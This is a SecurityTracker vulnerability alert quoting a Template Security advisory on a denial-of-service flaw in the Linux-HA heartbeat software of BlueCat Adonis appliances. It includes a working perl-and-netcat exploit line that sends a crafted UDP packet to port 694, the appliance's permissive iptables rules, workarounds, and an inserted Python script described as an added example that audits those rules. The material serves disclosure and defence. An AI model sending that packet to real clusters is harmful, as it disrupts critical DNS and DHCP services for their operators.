SecurityTracker.com
Category:   Device (Embedded Server/Appliance)  >   Adonis
Vendors:   BlueCat Networks
BlueCat Networks Adonis Linux-HA Heartbeat Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1018505
SecurityTracker URL:  http://securitytracker.com/id/1018505
CVE Reference:   CVE-2007-4205   (Links to External Site)
Updated:  Apr 21 2008
Original Entry Date:  Aug 3 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0.2.8; possibly other versions
Description:   A vulnerability was reported in Adonis. A remote user can cause denial of service conditions.

When XHA is configured, a remote user can send a specially crafted UDP packet to port 694 to cause the pair of target devices to both become active.

The vulnerability resides in the underlying Linux-HA heartbeat software.

A demonstration exploit command is provided:

$ perl -e 'print "###\n2147483647heart attack:%%%\n"' |
nc -u 192.168.1.12 694

It may also be possible to crash the control process on the passive node.

forloop discovered this vulnerability.

Impact:   A remote user can cause denial of service conditions.
Solution:   The vendor plans to issue a patch to set the firewall rules to block all traffic on port 694 to the cluster partner (to be available August 3, 2007).

The vendor plans to issue a fix (to be available later in August 2007).

Vendor URL:  www.bluecatnetworks.com/ (Links to External Site)
Cause:   State error

Message History:   None.


Source Message Contents

Subject:  TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

Template Security Security Advisory
-----------------------------------

  BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

  Date: 2007-07-29
  Advisory ID: TS-2007-001-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
  Revision: 0

Contents
--------

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
-------

  Template Security has discovered a serious Denial of Service
  (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP
  Appliance.  When XHA is configured to place two Adonis
  servers in an active-passive pair to provide high
  availability, a remote attacker can transmit a single UDP
  datagram to crash the heartbeat control process.  This can
  be used for example to create an active/active condition in
  the cluster pair.

Software Version
----------------

  Adonis version 5.0.2.8 was tested, and XHA was configured
  using the Proteus IPAM appliance.  It is possible any version
  of Adonis using heartbeat version 1.2.4 or earlier is
  vulnerable.

Details
-------

  XHA on Adonis uses the heartbeat software from the Linux-HA
  project (http://www.linux-ha.org/).  On the version of
  Adonis we tested, heartbeat version 1.2.3 is used.  This
  version is vulnerable to a well-known remote DoS attack
  which was announced on 2006-08-13:

    http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact
------

  Successful exploitation of the vulnerability will result in
  a DoS condition affecting critical DNS and DHCP services.

Exploit
-------

  In this example the XHA cluster is composed of:

    node-1: 192.168.1.12
    node-2: 192.168.1.13
    VIP:    192.168.1.11

  A remote attacker can perform the following to crash the
  heartbeat control process on node-1:

    $ perl -e 'print "###\n2147483647heart attack:%%%\n"' |
      nc -u 192.168.1.12 694

  If node-1 is the active node in the cluster, node-2 will
  take over the VIP and the cluster will be in an
  active/active condition.  Other scenarios are possible, such
  as crashing the control process on the passive node to
  prevent it from being able to assume the active role in a
  failure condition.

  Note that the iptables configuration on Adonis does not
  block packets to 694/udp; there is an explicit policy to
  permit port 694/udp from any to any in the INPUT and OUTPUT
  chain.  To verify this, you can login as root on the
  appliance and view the firewall configuration script:

    # grep 694 /usr/local/bluecat/doFirewall
    iptables -A INPUT  -p udp --dport 694 -j ACCEPT
    iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A INPUT  -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds
-----------

  The attack can be prevented by blocking packets to 694/udp.
  This can be performed at a firewall and by modifying the
  iptables configuration on the Adonis appliances.
  Appropriate anti-spoofing policies must also be in place,
  because an attacker can spoof the source IP address in the
  UDP datagram.

  When XHA was configured, iptables rules were configured in
  /usr/local/bluecat/firewall_rules/localHAFirewallConfig to
  permit 694/udp to and from the peer node on each appliance.
  However, these rules have no effect because of the any-to-any
  rules mentioned above.  They are also incorrect because they
  specify source port 694/udp, while the heartbeat packets we
  observed do not use a fixed source port.

  One possible workaround which may be used to temporarily
  prevent the attack is to comment out the 694/udp rules in
  the firewall startup script, then repair the rules in
  localHAFirewallConfig.  However, localHAFirewallConfig can
  be overwritten by /usr/local/bluecat/configLocalFirewall.sh.
  Due to this, we recommend that customers leave the iptables
  configuration unmodified and instead block 694/udp and
  enforce anti-spoofing at a firewall.
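  As an added example (not part of the advisory, BlueCat's scripts, or
  the Linux-HA project), the check below parses iptables rules of the
  form quoted in the Details section and flags the two defects the
  advisory describes: an INPUT rule that accepts 694/udp from any
  source, and peer rules that match a fixed source port 694.  It also
  emits the peer-scoped rule shape a perimeter device would enforce.
  The peer address, the sample rules and the exact form of the
  localHAFirewallConfig rules are assumptions.

```python
PEER = "192.168.1.13"  # assumed cluster partner (node-2 in the advisory's example)

# Constructed sample: the two appliance-wide rules quoted from doFirewall plus
# peer-scoped rules of the shape the advisory describes (fixed source port 694);
# the exact form of the localHAFirewallConfig rules is an assumption.
SAMPLE_RULES = """
iptables -A INPUT  -p udp --dport 694 -j ACCEPT
iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
iptables -A INPUT  -p udp -s 192.168.1.13 --sport 694 --dport 694 -j ACCEPT
iptables -A OUTPUT -p udp -d 192.168.1.13 --sport 694 --dport 694 -j ACCEPT
""".strip().splitlines()
# iptables options relevant to the audit, each followed by one argument.
_OPTS = {"-A": "chain", "-p": "proto", "-s": "src", "-d": "dst",
         "--sport": "sport", "--dport": "dport", "-j": "target"}

def parse_rule(line):
    """Reduce one 'iptables -A ...' line to the fields the audit needs."""
    rule = {name: None for name in _OPTS.values()}
    toks = line.split()
    for i, tok in enumerate(toks[:-1]):
        if tok in _OPTS:
            rule[_OPTS[tok]] = toks[i + 1]
    return rule

def audit(lines, peer):
    """(problem, line) pairs for ACCEPT rules that touch 694/udp:
    'exposed'     INPUT accepts from any source (the doFirewall rule)
    'wrong-peer'  INPUT accepts from a host other than the cluster partner
    'fixed-sport' rule matches source port 694, which heartbeat does not use"""
    findings = []
    for line in lines:
        r = parse_rule(line)
        if r["proto"] != "udp" or r["dport"] != "694" or r["target"] != "ACCEPT":
            continue
        if r["chain"] == "INPUT":
            if r["src"] in (None, "0.0.0.0/0"):
                findings.append(("exposed", line))
            elif r["src"] != peer:
                findings.append(("wrong-peer", line))
        if r["sport"] == "694":
            findings.append(("fixed-sport", line))
    return findings

def corrected_rules(peer):
    """Peer-only 694/udp rules with no source-port match; anti-spoofing stays upstream."""
    return [
        f"iptables -A INPUT  -p udp -s {peer} --dport 694 -j ACCEPT",
        f"iptables -A OUTPUT -p udp -d {peer} --dport 694 -j ACCEPT",
        "iptables -A INPUT  -p udp --dport 694 -j DROP",
    ]
```

  Running audit(SAMPLE_RULES, PEER) reports the any-to-any INPUT rule as
  exposed and both peer rules as using a fixed source port; the corrected
  set produces no findings.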

Obtaining Patched Software
--------------------------

  Contact the vendor.

Credits
-------

  forloop discovered that Adonis XHA was using vulnerable
  heartbeat software, and defaultroute read the heartbeat code
  to discover the exploit.  Both are members of Template
  Security.

Revision History
----------------

  2007-07-29: Revision 0 released

Copyright 2019, SecurityGlobal.net LLC